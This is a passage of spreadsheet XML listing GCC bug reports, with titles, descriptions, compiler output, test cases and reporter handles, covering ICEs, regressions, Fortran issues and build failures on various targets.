      return ix86_abi != SYSV_ABI ? X86_64_REGPARM_MAX : X64_REGPARM_MAX
    }
Shouldn't it be
return ix86_abi == SYSV_ABI ? X86_64_REGPARM_MAX : X64_REGPARM_MAX</t>
  </si>
  <si>
    <t>GCC-12263</t>
  </si>
  <si>
    <t>libf2c</t>
  </si>
  <si>
    <t>compiler error in libf2c/libI77/backspace.c</t>
  </si>
  <si>
    <t>Output of gcc -v:
Reading specs from
/usr/data2/local/gcc-3.3.1/lib/gcc-lib/mips-sgi-irix6.5/3.3.1/specs
Configured with: ../gcc-3.3.1.src/configure --prefix=/usr/data2/local/gcc-3.3.1
Thread model: single
gcc version 3.3.1
Compiler error generated while compiling with: gmake bootstrap:
While compiling : /libf2c/libI77/backspace.c
from file fio.h:2
from file stdio.h:18
from file internal/stdio_core.h:319
undefined type __gnuc___gnuc_va_list
Work around was to edit internal/stdio_core.h.
(1) #included  stdarg.h which defined : __gnuc_va_list
(2) changed line 319 from :
 	__SGI_LIBC_NAMESPACE_QUALIFIER __gnuc___gnuc_va_list _ap
to:
	__SGI_LIBC_NAMESPACE_QUALIFIER __gnuc_va_list _ap
then gmake bootstrap completed successfully.</t>
  </si>
  <si>
    <t>j.s.barry</t>
  </si>
  <si>
    <t>GCC-71117</t>
  </si>
  <si>
    <t>[6/7 Regression] Overeager application of conversion to function pointer during overload resolution of call to function object</t>
  </si>
  <si>
    <t>Casey Carter recently posted this to the committee core- mailing list:
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; BEGIN
It is a commonplace library technique to compose function objects which are often empty by inheritance to take advantage of the Empty Base Optimization. E.g. this program patterned on usage in range-v3 turns a function that accepts objects into a function that accepts iterators that denote objects:
template  T
template 
constexpr bool is_same = false
template 
constexpr bool is_same = true
template 
struct indirected : F {
    indirected(F f) : F(f) {}
    template 
    auto operator()(I i) -&gt; decltype(declval()(*i)) {
        return static_cast&lt;F
    }
}
int main() {
    auto f = [](auto rng) {
        static_assert(is_same )
        return 42
    }
    indirected i(f)
    static_assert(is_same())) int&gt; )
}
Unfortunately when the adapted function object is an underconstrained captureless generic lambda - as is the case in the example - composition by inheritance is extremely fragile. Since the lambda is captureless its closure type has a member conversion operator that converts to a function pointer type with deduced return type. An attempt to call the derived type's call operator results in overload resolution instantiating the conversion operator's declaration necessitating return type deduction from the base object's call operator. When the base object's call operator is ill-formed for the particular argument types - again as is the case in the example - the program is ill-formed.
GCC 6 and trunk tell me this program is ill-formed:
casey@Semiregular:~/bugs$ ~/gcc/bin/g++ -std=c++14 repro.cpp 
repro.cpp: In instantiation of â€˜main():: [with auto:1 = int*]â€™:
repro.cpp:17:25:   required by substitution of â€˜template main()::::operator decltype (((main()::)0u).operator()(static_cast())) (*)(auto:1)() const [with auto:1 = int*]â€™
repro.cpp:22:53:   required from here
repro.cpp:18:9: error: static assertion failed
         static_assert(is_same )
         ^~~~~~~~~~~~~
older versions of GCC and all versions of Clang I've tried compile the program without diagnostics. Since hiding of conversion operators is based on the target types and determining the target type of the problematic conversion operator results in the aforementioned ill-formed return type deduction there seems to be no way to hide the problematic conversion operator.
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; END
To which Richard Smith replied:
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; BEGIN
template using id = T
struct F {
  template operator id()
} f
int n = f(0)
GCC accepts this and calls the conversion function template with T=int. Clang EDG MSVC reject.
Per [over.call.object]/2 I think GCC is wrong per the current language wording. A conversion function template does not qualify as a non-explicit conversion function declared in [F or base class thereof] (because it is not a conversion function) and nor does a specialization of one (because it is not itself declared in F).
I also don't see any way the current wording would take us to [temp.deduct.conv] for this case nor how that wording would apply (since we don't have a function type that's required as the result of the conversion). Perhaps GCC is following the rules of [temp.deduct.call] in this case treating the (pointee type of the) result type of the conversion function as if it were the function type of the callee?
In the abstract GCC's approach to this situation seems superior -- it's able to use a conversion to function pointer in many cases where other compilers can't -- but I'm a little hesitant to suggest we adopt that approach since it breaks examples like yours.
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; END</t>
  </si>
  <si>
    <t>eric.niebler</t>
  </si>
  <si>
    <t>GCC-5973</t>
  </si>
  <si>
    <t>gcc 2.96 generates bad code to reference ((packed)) struct</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
gcc version 2.96 20000731 (Debian GNU/Linux IA64 experimental)
Environment:
ia64</t>
  </si>
  <si>
    <t>rhirst</t>
  </si>
  <si>
    <t>GCC-12912</t>
  </si>
  <si>
    <t>does not compile .f (f77) fortran files</t>
  </si>
  <si>
    <t>When one tries to compile a f77 program with a .f extension the gfortran returns
an error messages along the lines of the following:
gfortran: dcabs1.f: Fortran compiler not installed on this system
This problem appears to occur with any file with .f and is inpendent of the
host/target triplets.</t>
  </si>
  <si>
    <t>wcohen</t>
  </si>
  <si>
    <t>GCC-17741</t>
  </si>
  <si>
    <t>ICE in gfc_free_namespace at fortran/symbol.c:2208</t>
  </si>
  <si>
    <t>With 
GNU Fortran 95 (GCC 4.0.0 20040929 (experimental)) 
I receive the error 
$ ~/gcc/bin/gfortran ih_3determinant.f90  
 In file ih_3determinant.f90:8 
END SUBROUTINE ih_3determinant 
  1 
Error: Expecting END FUNCTION statement at (1) 
Error: Unexpected end of file in 'ih_3determinant.f90' 
ih_3determinant.f90:0: internal compiler error: in gfc_free_namespace at 
fortran/symbol.c:2208 
for the following illegal source code: 
SUBROUTINE ih_3determinant 
  IMPLICIT NONE 
  interface 
     integer function CCTKi_IsActiveCCCCAnalysis () 
       implicit none 
     end function CCTKi_IsActiveCCCCAnalysis 
     integer function CCTKi_IsActiveCCCC_CFC_Check () 
END SUBROUTINE ih_3determinant</t>
  </si>
  <si>
    <t>schnetter</t>
  </si>
  <si>
    <t>GCC-15986</t>
  </si>
  <si>
    <t>Forward referenced procedure not handled correctly</t>
  </si>
  <si>
    <t>The included code from cosmomc http://cosmologist.info/cosmomc/ causes an
internal compiler error:
gfortran -O0 -c recfast.f90
f951: ../../gcc-cvs/gcc/gcc/fortran/trans-decl.c:699: gfc_get_symbol_decl:
Assertion `sym-&gt;attr.referenced' failed.
recfast.f90: In function `initrecfast':
recfast.f90:408: internal compiler error: Aborted
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
xpc5:/cosmomc/camb&gt; gcc -v
Reading specs from /data/jss/gcc-cvs/lib/gcc/i686-pc-linux-gnu/3.5.0/specs
Configured with: ../gcc-cvs/gcc/configure --enable-languages=cc++f95
--prefix=/data/jss/gcc-cvs
Thread model: posix
gcc version 3.5.0 20040614 (experimental)</t>
  </si>
  <si>
    <t>jss</t>
  </si>
  <si>
    <t>GCC-19781</t>
  </si>
  <si>
    <t>testsuite_hooks.cc doesn't test for mkfifo</t>
  </si>
  <si>
    <t>testsuite/testsuite_hooks.cc is compiled as part of the libstdc++ build itself
rather than just for testing. I have a build problem there that therefore stops
the whole gcc build....
On line 233 ish there is:
  int
  try_mkfifo (const char* filename mode_t mode)
  {
#if defined (_NEWLIB_VERSION) || defined (__MINGW32_VERSION)
    /* Newlib and MinGW32 do not have mkfifo.  */
    exit(0)
#else
    return mkfifo(filename mode)
#endif
  }
However I am using an OS that does not have mkfifo and is not newlib-based
(various system headers copied into the appropriate sys-include location). This
test should instead be done by autoconf probably by just 
AC_CHECK_FUNCS(mkfifo) somewhere but I'm not sure exactly what's best in a
cross-compiled situation.
I can prepare a patch against gcc 3.4.3 if I have a little guidance or it may
be easier just to fix by someone more knowledgable in this area.</t>
  </si>
  <si>
    <t>jifl-bugzilla</t>
  </si>
  <si>
    <t>GCC-26147</t>
  </si>
  <si>
    <t>another memory leak</t>
  </si>
  <si>
    <t>After running coverity tool I discovered following memory leaks.
1) in gcc/opts.c: memory never freed allocated by 'new_option' pointer.
2) in gcc/df-core.c: Memory never freed allocated by 'postorder' pointer.
3) in tree-data-ref.c: memory never freed allocated by dist_v and init_v pointers.
I'll submit the patches to fix these leaks.</t>
  </si>
  <si>
    <t>GCC-54853</t>
  </si>
  <si>
    <t>internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 28381
main.ii.gz
I am getting:
/home/lvv/p/scc/chain_range.h:246:25: internal compiler error: Segmentation fault
Preprocessed source is attached
gcc -v
Using built-in specs.
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/4.7.2/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.7.2/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.7.2/work/gcc-4.7.2/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.7.2 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.7.2 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.7.2/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.7.2/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.7.2/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --with-ppl --with-cloog --disable-ppl-version-check --with-cloog-include=/usr/include/cloog-ppl --enable-lto --enable-nls --without-included-gettext --with-system-zlib --enable-obsolete --disable-werror --enable-secureplt --enable-multilib --with-multilib-list=m32m64 --enable-libmudflap --disable-libssp --enable-libgomp --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.7.2/python --enable-checking=release --disable-libgcj --enable-languages=cc++fortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-targets=all --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.7.2 p1.0 pie-0.5.3'
Thread model: posix
gcc version 4.7.2 (Gentoo 4.7.2 p1.0 pie-0.5.3)</t>
  </si>
  <si>
    <t>leonid</t>
  </si>
  <si>
    <t>GCC-30948</t>
  </si>
  <si>
    <t>intrinsic: CHDIR</t>
  </si>
  <si>
    <t>subroutine = {
	name = 'chdir'
	arg  = 'path'
	arg  = 'status'
	call = 'CALL chdir(path = string)'
	call = 'CALL chdir(path = string status = int_1)'
	call = 'CALL chdir(path = string status = int_2)'
	call = 'CALL chdir(path = string status = int_4)'
	call = 'CALL chdir(path = string status = int_8)'
}
1. The name of the first dummy argument is NAME instead of PATH (as documented)
2. The library does not provide overloads for int1 and int2 (i16?)
3. The documentation does not specify the type of the STATUS argument</t>
  </si>
  <si>
    <t>GCC-52081</t>
  </si>
  <si>
    <t>Missed tail merging with pure calls</t>
  </si>
  <si>
    <t>pr51879-12.c:
...
__attribute__((pure)) int bar (int)
__attribute__((pure)) int bar2 (int)
void baz (int)
int x z
void
foo (int y)
{
  int a = 0
  if (y == 6)
    {
      a += bar (7)
      a += bar2 (6)
    }
  else
    {
      a += bar2 (6)
      a += bar (7)
    }
  baz (a)
}
...
When compiling at -O2 pr51879-12.c.094t.pre looks like this:
...
  # BLOCK 3 freq:1991
  # PRED: 2 [19.9%]  (trueexec)
  # VUSE 
  # USE = nonlocal escaped 
  D.1717_4 = barD.1703 (7)
  # VUSE 
  # USE = nonlocal escaped 
  D.1718_6 = bar2D.1705 (6)
  aD.1713_7 = D.1717_4 + D.1718_6
  goto 
  # SUCC: 5 [100.0%]  (fallthruexec)
  # BLOCK 4 freq:8009
  # PRED: 2 [80.1%]  (falseexec)
  # VUSE 
  # USE = nonlocal escaped 
  D.1720_8 = bar2D.1705 (6)
  # VUSE 
  # USE = nonlocal escaped 
  D.1721_10 = barD.1703 (7)
  aD.1713_11 = D.1720_8 + D.1721_10
  # SUCC: 5 [100.0%]  (fallthruexec)
  # BLOCK 5 freq:10000
  # PRED: 3 [100.0%]  (fallthruexec) 4 [100.0%]  (fallthruexec)
  # aD.1713_1 = PHI 
  # .MEMD.1722_13 = VDEF 
  # USE = nonlocal 
  # CLB = nonlocal 
  bazD.1707 (aD.1713_1)
  # VUSE 
  return
...
Value numbering numbers the two phi arguments a_7 and a_11 the same so the problem is not in value numbering:
...
Setting value number of a_11 to a_7 (changed)
...</t>
  </si>
  <si>
    <t>GCC-38582</t>
  </si>
  <si>
    <t>excessive time in rename registers</t>
  </si>
  <si>
    <t>This is split off from PR38474 for clarity. Compiling the testcase of that PR 
(http://gcc.gnu.org/bugzilla/attachment.cgi?id=16873)
as
gfortran-4.3 -ffree-line-length-512 -g -ffree-form -ftime-report -c -O3 -march=native -funroll-loops testcase.f90
shows that about 13 hours are needed in rename registers.
Execution times (seconds)
 garbage collection    :   3.96 ( 0%) usr   0.00 ( 0%) sys   3.95 ( 0%) wall   
   0 kB ( 0%) ggc
 callgraph construction:   0.42 ( 0%) usr   0.01 ( 0%) sys   0.44 ( 0%) wall  
10751 kB ( 1%) ggc
 callgraph optimization:   0.78 ( 0%) usr   0.02 ( 0%) sys   0.82 ( 0%) wall  
14320 kB ( 1%) ggc
 ipa reference         :   0.17 ( 0%) usr   0.00 ( 0%) sys   0.17 ( 0%) wall   
   0 kB ( 0%) ggc
 ipa pure const        :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall   
   0 kB ( 0%) ggc
 cfg cleanup           :   0.08 ( 0%) usr   0.00 ( 0%) sys   0.08 ( 0%) wall   
   0 kB ( 0%) ggc
 trivially dead code   :   5.36 ( 0%) usr   0.00 ( 0%) sys   5.38 ( 0%) wall   
   0 kB ( 0%) ggc
 df reaching defs      :   6.56 ( 0%) usr   0.07 ( 1%) sys   6.60 ( 0%) wall   
   0 kB ( 0%) ggc
 df live regs          :  16.93 ( 0%) usr   0.00 ( 0%) sys  16.96 ( 0%) wall   
   0 kB ( 0%) ggc
 df live&amp;initialized regs:   7.39 ( 0%) usr   0.00 ( 0%) sys   7.38 ( 0%) wall 
     0 kB ( 0%) ggc
 df use-def / def-use chains:  14.49 ( 0%) usr   0.02 ( 0%) sys  14.52 ( 0%)
wall       0 kB ( 0%) ggc
 df reg dead/unused notes:  10.94 ( 0%) usr   0.00 ( 0%) sys  10.96 ( 0%) wall 
 37217 kB ( 3%) ggc
 register information  :   4.97 ( 0%) usr   0.00 ( 0%) sys   4.97 ( 0%) wall   
   0 kB ( 0%) ggc
 alias analysis        :   8.84 ( 0%) usr   0.01 ( 0%) sys   8.86 ( 0%) wall  
49164 kB ( 3%) ggc
 register scan         :   1.78 ( 0%) usr   0.00 ( 0%) sys   1.80 ( 0%) wall   
   0 kB ( 0%) ggc
 rebuild jump labels   :   3.93 ( 0%) usr   0.00 ( 0%) sys   3.93 ( 0%) wall   
   0 kB ( 0%) ggc
 parser                :   3.24 ( 0%) usr   0.10 ( 1%) sys   3.35 ( 0%) wall  
60522 kB ( 4%) ggc
 inline heuristics     :2516.42 ( 4%) usr   4.20 (35%) sys2542.00 ( 4%) wall   
   0 kB ( 0%) ggc
 tree gimplify         :   0.55 ( 0%) usr   0.00 ( 0%) sys   0.54 ( 0%) wall   
3453 kB ( 0%) ggc
 tree eh               :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall   
   0 kB ( 0%) ggc
 tree CFG construction :   0.02 ( 0%) usr   0.01 ( 0%) sys   0.03 ( 0%) wall   
7185 kB ( 1%) ggc
 tree CFG cleanup      :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall   
   1 kB ( 0%) ggc
 tree VRP              :   0.25 ( 0%) usr   0.00 ( 0%) sys   0.23 ( 0%) wall   
  36 kB ( 0%) ggc
 tree copy propagation :   0.63 ( 0%) usr   0.00 ( 0%) sys   0.60 ( 0%) wall   
   6 kB ( 0%) ggc
 tree find ref. vars   :   0.12 ( 0%) usr   0.01 ( 0%) sys   0.12 ( 0%) wall   
8202 kB ( 1%) ggc
 tree PTA              :   3.61 ( 0%) usr   0.07 ( 1%) sys   3.64 ( 0%) wall   
  96 kB ( 0%) ggc
 tree alias analysis   :   6.71 ( 0%) usr   0.11 ( 1%) sys   6.74 ( 0%) wall   
   3 kB ( 0%) ggc
 tree call clobbering  :   0.39 ( 0%) usr   0.00 ( 0%) sys   0.37 ( 0%) wall   
   0 kB ( 0%) ggc
 tree flow sensitive alias:   0.11 ( 0%) usr   0.00 ( 0%) sys   0.12 ( 0%) wall
      9 kB ( 0%) ggc
 tree flow insensitive alias:   3.54 ( 0%) usr   0.00 ( 0%) sys   3.53 ( 0%)
wall       0 kB ( 0%) ggc
 tree memory partitioning:  18.88 ( 0%) usr   0.03 ( 0%) sys  18.93 ( 0%) wall 
     0 kB ( 0%) ggc
 tree PHI insertion    :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall   
   1 kB ( 0%) ggc
 tree SSA rewrite      :   0.17 ( 0%) usr   0.00 ( 0%) sys   0.18 ( 0%) wall  
25972 kB ( 2%) ggc
 tree SSA other        :   0.02 ( 0%) usr   0.03 ( 0%) sys   0.08 ( 0%) wall   
   0 kB ( 0%) ggc
 tree SSA incremental  :   0.82 ( 0%) usr   0.00 ( 0%) sys   0.82 ( 0%) wall   
   9 kB ( 0%) ggc
 tree operand scan     :6681.62 (11%) usr   0.55 ( 5%) sys6698.35 (11%) wall  
19727 kB ( 1%) ggc
 dominator optimization:   0.26 ( 0%) usr   0.00 ( 0%) sys   0.25 ( 0%) wall   
  11 kB ( 0%) ggc
 tree SRA              :   0.06 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall   
   0 kB ( 0%) ggc
 tree STORE-CCP        :   0.15 ( 0%) usr   0.00 ( 0%) sys   0.15 ( 0%) wall   
   1 kB ( 0%) ggc
 tree CCP              :   0.18 ( 0%) usr   0.00 ( 0%) sys   0.19 ( 0%) wall   
   3 kB ( 0%) ggc
 tree reassociation    :   0.07 ( 0%) usr   0.00 ( 0%) sys   0.08 ( 0%) wall   
   2 kB ( 0%) ggc
 tree PRE              :   0.37 ( 0%) usr   0.00 ( 0%) sys   0.38 ( 0%) wall   
2289 kB ( 0%) ggc
 tree FRE              :   0.38 ( 0%) usr   0.01 ( 0%) sys   0.38 ( 0%) wall   
2297 kB ( 0%) ggc
 tree linearize phis   :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall   
   0 kB ( 0%) ggc
 tree forward propagate:   0.04 ( 0%) usr   0.00 ( 0%) sys   0.03 ( 0%) wall   
   0 kB ( 0%) ggc
 tree conservative DCE :   0.53 ( 0%) usr   0.00 ( 0%) sys   0.56 ( 0%) wall   
   0 kB ( 0%) ggc
 tree aggressive DCE   :   0.11 ( 0%) usr   0.00 ( 0%) sys   0.12 ( 0%) wall   
   0 kB ( 0%) ggc
 tree DSE              :   0.06 ( 0%) usr   0.00 ( 0%) sys   0.05 ( 0%) wall   
   0 kB ( 0%) ggc
 tree SSA to normal    :   0.09 ( 0%) usr   0.00 ( 0%) sys   0.08 ( 0%) wall   
   3 kB ( 0%) ggc
 tree rename SSA copies:   0.06 ( 0%) usr   0.00 ( 0%) sys   0.06 ( 0%) wall   
   0 kB ( 0%) ggc
 expand                :1279.48 ( 2%) usr   2.74 (23%) sys1285.18 ( 2%) wall 
440026 kB (31%) ggc
 lower subreg          :   0.09 ( 0%) usr   0.00 ( 0%) sys   0.09 ( 0%) wall   
   0 kB ( 0%) ggc
 forward prop          :   1.74 ( 0%) usr   0.03 ( 0%) sys   1.73 ( 0%) wall   
8458 kB ( 1%) ggc
 CSE                   :   9.02 ( 0%) usr   0.04 ( 0%) sys   9.04 ( 0%) wall  
27164 kB ( 2%) ggc
 dead code elimination :   3.63 ( 0%) usr   0.00 ( 0%) sys   3.62 ( 0%) wall   
   0 kB ( 0%) ggc
 dead store elim1      :   5.64 ( 0%) usr   0.05 ( 0%) sys   5.69 ( 0%) wall  
37803 kB ( 3%) ggc
 dead store elim2      :   7.64 ( 0%) usr   0.01 ( 0%) sys   7.65 ( 0%) wall  
38112 kB ( 3%) ggc
 web                   :   1.38 ( 0%) usr   0.02 ( 0%) sys   1.41 ( 0%) wall   
   0 kB ( 0%) ggc
 CSE 2                 :   4.26 ( 0%) usr   0.02 ( 0%) sys   4.29 ( 0%) wall  
10087 kB ( 1%) ggc
 branch prediction     :   0.04 ( 0%) usr   0.00 ( 0%) sys   0.05 ( 0%) wall   
   3 kB ( 0%) ggc
 combiner              :   5.02 ( 0%) usr   0.03 ( 0%) sys   5.06 ( 0%) wall  
17823 kB ( 1%) ggc
 regmove               :   4.83 ( 0%) usr   0.00 ( 0%) sys   4.83 ( 0%) wall   
   1 kB ( 0%) ggc
 local alloc           :  11.33 ( 0%) usr   0.08 ( 1%) sys  11.36 ( 0%) wall  
64779 kB ( 5%) ggc
 global alloc          :  21.86 ( 0%) usr   0.69 ( 6%) sys  22.55 ( 0%) wall 
275939 kB (20%) ggc
 reload CSE regs       :  10.28 ( 0%) usr   0.00 ( 0%) sys  10.29 ( 0%) wall  
79246 kB ( 6%) ggc
 load CSE after reload :   0.84 ( 0%) usr   0.00 ( 0%) sys   0.85 ( 0%) wall   
   0 kB ( 0%) ggc
 thread pro- &amp; epilogue:   0.89 ( 0%) usr   0.00 ( 0%) sys   0.89 ( 0%) wall   
  13 kB ( 0%) ggc
 peephole 2            :   1.46 ( 0%) usr   0.00 ( 0%) sys   1.46 ( 0%) wall   
   0 kB ( 0%) ggc
 rename registers      :49100.30 (82%) usr   2.30 (19%) sys49376.54 (82%) wall 
 16842 kB ( 1%) ggc
 scheduling 2          :  21.80 ( 0%) usr   0.60 ( 5%) sys  22.39 ( 0%) wall 
150933 kB (11%) ggc
 machine dep reorg     :   1.99 ( 0%) usr   0.00 ( 0%) sys   2.00 ( 0%) wall   
   0 kB ( 0%) ggc
 reorder blocks        :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall   
   1 kB ( 0%) ggc
 final                 :   3.83 ( 0%) usr   0.04 ( 0%) sys   3.88 ( 0%) wall   
 738 kB ( 0%) ggc
 symout                :   0.10 ( 0%) usr   0.00 ( 0%) sys   0.10 ( 0%) wall   
5418 kB ( 0%) ggc
 variable tracking     :   1.86 ( 0%) usr   0.02 ( 0%) sys   1.87 ( 0%) wall   
  17 kB ( 0%) ggc
 TOTAL                 :59825.47            11.92          60151.75           
1415015 kB</t>
  </si>
  <si>
    <t>GCC-82059</t>
  </si>
  <si>
    <t>[8 Regression] ICE in dump_profile at gimple-pretty-print.c:89</t>
  </si>
  <si>
    <t>Starting from r249277 we ICE on:
$ cat /tmp/obstack2.i
struct a
{
  char b
  struct a *c
} d () f
void *e
long g
void
h ()
{
  struct a *i = 0
  if (g)
    i = e
  if (!i)
    d ()
  i-&gt;c = 
  i-&gt;b = *(char *) h
}
$ ./gcc/xgcc -O2 -fdump-tree-all -Bgcc /tmp/obstack2.i
during GIMPLE pass: isolate-paths
dump file: obstack2.i.120t.isolate-paths
/tmp/obstack2.i: In function â€˜_obstack_newchunkâ€™:
/tmp/obstack2.i:15:6: internal compiler error: in dump_profile at gimple-pretty-print.c:89
 void _obstack_newchunk() {
      ^~~~~~~~~~~~~~~~~
0x623202 dump_profile
	../../gcc/gimple-pretty-print.c:89
0x623202 dump_gimple_bb_header
	../../gcc/gimple-pretty-print.c:2700
0x623202 gimple_dump_bb(_IO_FILE* basic_block_def* int unsigned long)
	../../gcc/gimple-pretty-print.c:2862
0x98414f dump_bb(_IO_FILE* basic_block_def* int unsigned long)
	../../gcc/cfghooks.c:276
0xd5e8c4 dump_function_to_file(tree_node* _IO_FILE* unsigned long)
	../../gcc/tree-cfg.c:7766
0xc65a53 execute_function_dump
	../../gcc/passes.c:1760
0x142333c diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*)
	../../gcc/diagnostic.c:963
0x142358e diagnostic_impl
	../../gcc/diagnostic.c:1099
0x1424214 internal_error(char const* ...)
	../../gcc/diagnostic.c:1422
0x843bc6 fancy_abort(char const* int char const*)
	../../gcc/diagnostic.c:1488
0x623202 dump_profile
	../../gcc/gimple-pretty-print.c:89
0x623202 dump_gimple_bb_header
	../../gcc/gimple-pretty-print.c:2700
0x623202 gimple_dump_bb(_IO_FILE* basic_block_def* int unsigned long)
	../../gcc/gimple-pretty-print.c:2862
0x98414f dump_bb(_IO_FILE* basic_block_def* int unsigned long)
	../../gcc/cfghooks.c:276
0xd5e8c4 dump_function_to_file(tree_node* _IO_FILE* unsigned long)
	../../gcc/tree-cfg.c:7766
0xc65a53 execute_function_dump
	../../gcc/passes.c:1760
I've got patch for that.</t>
  </si>
  <si>
    <t>GCC-3176</t>
  </si>
  <si>
    <t>relocatable problem on powerpc-eabi and powerpc-rtems</t>
  </si>
  <si>
    <t>Build fails with following output
/usr3/ftp_archive/gnu/gcc/ss/b1/b-powerpc/gcc/xgcc -B/usr3/ftp_archive/gnu/gcc/s
s/b1/b-powerpc/gcc/ -nostdinc++ -L/usr3/ftp_archive/gnu/gcc/ss/b1/b-powerpc/powe
rpc-rtems/nof/libstdc++-v3/src -L/usr3/ftp_archive/gnu/gcc/ss/b1/b-powerpc/power
pc-rtems/nof/libstdc++-v3/src/.libs -nostdinc -B/usr3/ftp_archive/gnu/gcc/ss/b1/
b-powerpc/powerpc-rtems/nof/newlib/ -isystem /usr3/ftp_archive/gnu/gcc/ss/b1/b-p
owerpc/powerpc-rtems/nof/newlib/targ-include -isystem /usr3/ftp_archive/gnu/gcc/
ss/b1/gcc-3.0-20010611/newlib/libc/include -B/opt/rtems/powerpc-rtems/bin/ -B/op
t/rtems/powerpc-rtems/lib/ -isystem /opt/rtems/powerpc-rtems/include -msoft-floa
t -mrelocatable-lib -mno-eabi -mstrict-align -I../../../../../gcc-3.0-20010611/l
ibstdc++-v3/../gcc -I../../../../../gcc-3.0-20010611/libstdc++-v3/../include -I.
./../../../../gcc-3.0-20010611/libstdc++-v3/include -I../../../../../gcc-3.0-200
10611/libstdc++-v3/include/std -I../../../../../gcc-3.0-20010611/libstdc++-v3/in
clude/c_std -I../include -I../../../../../gcc-3.0-20010611/libstdc++-v3/libsupc+
+ -g -O2 -msoft-float -mrelocatable-lib -mno-eabi -mstrict-align -fno-implicit-t
emplates -Wall -Wno-format -W -Wwrite-strings -Winline -fdiagnostics-show-locati
on=once -g -c ../../../../../gcc-3.0-20010611/libstdc++-v3/libsupc++/new_op.cc -
o new_op.o
/tmp/ccrqtaRh.s: Assembler messages:
/tmp/ccrqtaRh.s:234: Error: Relocation cannot be done when using -mrelocatable
make[7]: *** [new_op.lo] Error 1
Release:
gcc 3.0-20010611
Environment:
GNU/Linux Redhat 6.2
How-To-Repeat:
configure for powerpc-unknown-eabi or powerpc-rtems
../gcc-3.0-20010611/configure --target=powerpc-rtems --with-gnu-as --with-gnu-
ld --with-newlib --verbose --enable-threads --prefix=/opt/rtems
../gcc-3.0-20010527/configure --target=powerpc-unknown-eabi --with-gnu-as --wi
th-gnu-ld --with-newlib --verbose --prefix=/usr1/tmp-tools</t>
  </si>
  <si>
    <t>GCC-20838</t>
  </si>
  <si>
    <t>ICE in gfc_conv_expr_descriptor at fortran/trans-array.c:3606</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
INTEGER PARAMETER DIMENSION(3) :: subs=(/132/)
INTEGER DIMENSION(3) TARGET :: vals
INTEGER POINTER DIMENSION(:) :: ptr
ptr=&gt;vals(subs)
END</t>
  </si>
  <si>
    <t>GCC-26315</t>
  </si>
  <si>
    <t>[4.2 Regression] ACATS failures c43208b c85006a c85006d cd92001</t>
  </si>
  <si>
    <t>These four failures were introduced recently and show up on both x86 and amd64-linux.
PASS: Tue Feb 14 21:54:03 UTC 2006 (revision 110997)
FAIL: Feb 15 21:37:04 UTC 2006 (revision 111118)
.. C43208B ACATS 2.5 06-02-16 05:25:54
---- C43208B CHECK THAT THE EVALUATION OF A MULTIDIMENSIONAL ARRAY TYPE 
                THAT HAS AN ARRAY COMPONENT TYPE IS PERFORMED CORRECTLY.
   * C43208B CASE B2 : F NOT EVALUATED (C-B+1)*(E-D+1) TIMES.
   * C43208B CASE B2 : G NOT EVALUATED (C-B+1)*(E-D+1) TIMES.
   * C43208B CASE B2 : H NOT EVALUATED (C-B+1)*(E-D+1) TIMES.
...
.. C85006A ACATS 2.5 06-02-16 05:35:57
---- C85006A CHECK THAT A COMPONENT OR SLICE OF A VARIABLE CREATED BY AN
                OBJECT DECLARATION CAN BE RENAMED AND HAS THE CORRECT
                VALUE AND THAT THE NEW NAME CAN BE USED IN AN
                ASSIGNMENT STATEMENT AND PASSED ON AS AN ACTUAL
                SUBPROGRAM OR ENTRY 'IN OUT' OR 'OUT' PARAMETER AND AS 
                AN ACTUAL GENERIC 'IN OUT' PARAMETER AND THAT WHEN THE 
                VALUE OF THE RENAMED VARIABLE IS CHANGED THE NEW VALUE 
                IS REFLECTED BY THE VALUE OF THE NEW NAME.
   * C85006A INCORRECT VALUE OF XAI1( 1) (5).
   * C85006A INCORRECT VALUE OF XAI1( 2) (5).
...
.. C85006D ACATS 2.5 06-02-16 05:36:24
---- C85006D CHECK THAT A COMPONENT OR SLICE OF A VARIABLE CREATED BY A 
                GENERIC 'IN OUT' FORMAL PARAMETER CAN BE RENAMED AND HAS
                THE CORRECT VALUE AND THAT THE NEW NAME CAN BE USED IN 
